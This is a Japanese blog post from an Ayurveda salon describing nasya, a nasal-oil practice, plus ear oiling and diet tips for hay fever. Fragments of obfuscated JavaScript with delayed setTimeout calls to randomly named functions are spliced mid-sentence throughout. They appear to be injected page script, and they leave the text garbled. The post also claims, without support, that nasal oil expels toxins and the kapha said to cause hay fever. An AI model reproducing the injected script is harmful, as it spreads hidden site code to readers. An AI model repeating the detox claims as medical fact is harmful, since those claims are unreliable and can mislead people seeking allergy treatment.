私の花粉症対策

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
前回、春のカパ対策についてお話しましたが、
もう一つ、春におすすめ…というか、
春に備えてやった方が良いものがあるのでご紹介します。
それが、「ナスヤ」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}です。
以前にも、そのやり方はかいたので詳細はこちらを。
『自分で出来る浄化法「ナスヤ」』
2013-04-15s.jpgandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

このナスヤ、鼻にオイルを入れて口から吐き出すことで、
鎖骨から上の毒素を排泄するというもの。
花粉症の原因となる過剰なカパを、これで出すことができます。andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
鼻炎など、鼻に問題がある人には全般的におすすめです。

鼻に入れるオイルは、アヌタイラと言うナスヤ用のオイルが最高andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ですが、
太白ごま油でも大丈夫andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}です。
ほんの2滴程度を鼻に入れて、しっかり吸ってください。
前に、症状が悪いので、効くようにたくさん入れたいから、
どのくらいまで入れていいか、と言う質問を受けたのですが、
アーユルヴェーダ医師の元でやる以外は、絶対に大量に入れてはいけませんandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
反応が激しくなって、どんな変化が起こるか分からないですし、
良いと思ったことが、悪い結果を生むかもしれません。
セルフケアは、あくまでセルフケアとして、
長く続けることで少しずつ改善を目指しましょう。
また、ナスヤまで出来ない方は、
鼻孔にオイルを塗るだけでもOKなので、お試しください。

指にオイルを取って、鼻の内側に塗るだけ。
オイルは、粘膜から吸収されます。
余談ですが、ヴァータ(風)が乱れやすい方などは、
耳の中にオイルを塗るandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
と落ち着きます。
不安や心配が多い、音がやたらと気になる、
夜の寝つきが悪い、などはヴァータ乱れの現れです。
塗るだけでなく、丸めたコットンにオイルを含ませたもので耳栓をし、
音もさえぎると、より効果が上がるでしょう。

さて、そんなナスヤを、ちょいちょいさぼりながらも
自分史上としては、一番がんばってやってきたつもりの一年。
さて、花粉症は少しは軽くなってくれてるでしょうか?
ドキドキ・・・
はあ、こうして時期が来て初めて、
ちゃんと毎日やればよかったなーって思うんですよねー
ダメですよねー(笑)
でも、またちゃんと頑張ろうと思ってアヌタイラ買いました
やろうと言う気持ちですよ気合ですよ大事なのは
実際に効果が望めるのは、カパを溜めないように
冬の間からの対策することが大切ですが、今からでも
肉類や乳製品を減らして、春の苦みや渋みのある野菜をとったり
体も冷やさない、食べるものも冷やすものを避ける、など
できることはやると良いですね。
特に、髪の毛を洗った後、ちゃんと乾かさないのは冷えて
カパを溜める一因となります。要注意[emoji:e-2] アーユルヴェーダサロンmanas 《マナス》

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です